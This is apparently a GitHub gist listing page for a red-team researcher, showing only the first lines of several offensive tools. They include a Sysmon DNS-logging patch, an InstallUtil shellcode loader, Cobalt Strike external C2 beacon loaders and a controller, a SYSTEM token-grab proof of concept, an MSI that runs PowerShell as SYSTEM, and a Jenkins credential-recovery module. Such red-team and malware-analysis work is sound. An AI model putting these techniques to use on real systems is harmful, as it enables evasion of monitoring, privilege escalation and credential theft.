Adam Chester xpn

🦆

Migrated…

|| RedTeamer and Infosec Researcher ||

xpn / dns_sysmon_patch.c

Last active May 4, 2022 15:47

	#include <iostream>
	#include <Windows.h>
	#include <WinDNS.h>

	// Pattern for hunting dnsapi!McTemplateU0zqxqz
	#define PATTERN (unsigned char*)"\x48\x89\x5c\x24\x08\x44\x89\x4c\x24\x20\x55\x48\x8d\x6c"
	#define PATTERN_LEN 14

	// Search for pattern in memory
	DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) {

xpn / InstallUtil-Shellcode-cs

Created May 11, 2018 01:15 — forked from lithackr/InstallUtil-Shellcode-cs

From https://gist.github.com/subTee/408d980d88515a539672

	using System;
	using System.Net;
	using System.Diagnostics;
	using System.Reflection;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;

	/*
	Author: Casey Smith, Twitter: @subTee
	License: BSD 3-Clause

xpn / clr_via_native.c

Created April 11, 2018 21:34

A quick example showing loading CLR via native code

	#include "stdafx.h"

	int main()
	{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;

xpn / external_client_filetransfer.cpp

Created March 28, 2018 22:10

	#include "stdafx.h"

	// Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread
	void spawnBeacon(char *payload, DWORD len) {

	HANDLE threadHandle;
	DWORD threadId = 0;
	char alloc = (char )VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(alloc, payload, len);

xpn / external_client.cpp

Created March 28, 2018 22:06

	#include "stdafx.h"

	// Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread
	void spawnBeacon(char *payload, DWORD len) {

	HANDLE threadHandle;
	DWORD threadId = 0;
	char alloc = (char )VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(alloc, payload, len);

xpn / external_controller.py

Last active March 9, 2023 03:03

	import socket
	import struct
	import time

	class ExternalC2Controller:
	def __init__(self, port):
	self.port = port

	def encodeFrame(self, data):
	return struct.pack("<I", len(data)) + data

xpn / getsystem_parent.cpp

Created November 20, 2017 00:11

A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS

	#include "stdafx.h"

	BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
	TOKEN_PRIVILEGES tp;
	LUID luid;
	TOKEN_PRIVILEGES tpPrevious;
	DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);

	if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;

xpn / msigen.wix

Created November 6, 2017 22:41

WIX file with embedded Powershell, which will be executed as SYSTEM

	<?xml version="1.0"?>
	<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
	<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
	<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
	<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>

	<Directory Id="TARGETDIR" Name="SourceDir">
	<Directory Id="ProgramFilesFolder">
	<Directory Id="INSTALLLOCATION" Name="Example">
	<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">

xpn / jenkins_passwords.rb

Created October 15, 2017 15:27

Recover jenkins credentials in meterpreter

	##
	# This module requires Metasploit: https://metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'nokogiri'
	require 'digest'
	require 'openssl'
	require 'base64'

xpn / apt33_dropshot_decoder.py

Created September 20, 2017 22:30

IDAPython encrypted string decoder for DROPSHOT - APT33

	import idc
	import idaapi
	from idautils import *

	decryptTable = 0x41BA3C
	decryptTableEnd = 0x41BA77
	decryptFunction = 0x4012A0

	# Get the translation table
	bytes = idaapi.get_many_bytes(decryptTable, decryptTable-decryptTableEnd)